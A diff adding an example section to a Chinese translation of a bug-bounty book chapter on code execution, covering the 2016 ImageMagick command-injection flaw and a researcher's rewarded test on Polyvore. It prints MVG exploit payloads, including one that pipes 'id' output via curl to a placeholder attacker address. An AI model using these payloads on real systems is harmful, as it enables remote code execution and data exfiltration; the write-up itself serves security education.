--- a/Web_Hacking_101/0x11-代碼執行.md
+++ b/Web_Hacking_101/0x11-代碼執行.md
@@ -21,3 +21,53 @@ eval($var);
 <p>
 
 例如 PHP 中，這可能表現為用戶輸入傳遞給`system`函數。
+
+
+## **示例**
+
+### **1. Polyvore ImageMagick**
+ImageMagick 是個軟件包，通常用於處理圖像，例如剪裁、縮放等等。 PHP 的 imagick、Ruby 的 rmagick 以及 paperclip，以及 NodeJs 的 imagemagick 都利用了它。在 2016 年 4 月，該庫中發現了多個漏洞，其中可利用的漏洞之一就是執行遠程代碼，這就是我關註的。
+
+簡單來說，ImageMagick 並沒有合理地傳給他的過濾文件名稱，並且最終用於執行system方法調用。因此，攻擊者利益傳入命令來執行，就像`https://example.com”|ls"-la`，它會被執行。一個來自 ImageMagick 的例子是：
+
+```
+convert 'https://example.com"|ls "-la' out.png
+```
+
+現在，有趣的是，ImageMagick 為 MVG（Magick Vectire Graphics）文件定義了自己的語法。所以，攻擊者能夠創建文件exploit.mvg，帶有下列代碼：
+
+```
+push graphic-context
+viewbox 0 0 640 480
+fill 'url(https://example.com/image.jpg"|ls "-la)'
+pop graphic-context
+```
+
+這之後會傳給該庫，並且如果站點存在漏洞，代碼會執行並列出目錄中的文件。
+
+了解其背景之後，Ben Sadeghipour 測試了 Yahoo acquisition 站點以及 Polyvore 是否存在漏洞。就像他博文中所述，Ben 首先在它所控制的本地機器上測試了該漏洞，來確認mvg文件是否正常工作。這是他使用的代碼：
+
+```
+push graphic-context
+viewbox 0 0 640 480
+image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:80
+80/ -d @- > /dev/null`'
+pop graphic-context
+```
+
+這裏你可以看到，它使用了 CURL 庫來調用 SOMEIPADDRESS（將其修改為你服務器的地址）。如果成功，你就會得到像這樣的響應：
+
+![1](https://raw.githubusercontent.com/dyeat/Document_read/master/Web_Hacking_101/image/15-1.jpg)
+
+Ben Sadeghipour ImageMagick 測試的服務器響應
+下面 Ben 瀏覽了 Polyvore，將文件上傳為它的資料頭像，並在它的服務器上收到了這個響應：
+
+![1](https://raw.githubusercontent.com/dyeat/Document_read/master/Web_Hacking_101/image/15-2.jpg)
+
+Ben Sadeghipour Polyvore ImageMagick 響應
+>重要結論
+>
+>閱讀是成功滲透的重要組成部分，這包括閱讀軟件漏洞和常見漏洞，以及披露（CVE 標識符）。
+>當你碰到沒有安裝安全更新的站點時，了解之前的漏洞能夠幫助你。
+>這裏， Yahoo 已經修補了服務器，但是沒有正確完成（我找不到關於這是什麽意思的解釋）。
+>一次你，了解 ImageMagick 漏洞讓 Ben 特地以這個軟件為目標，並得到了 $2000 的獎金。
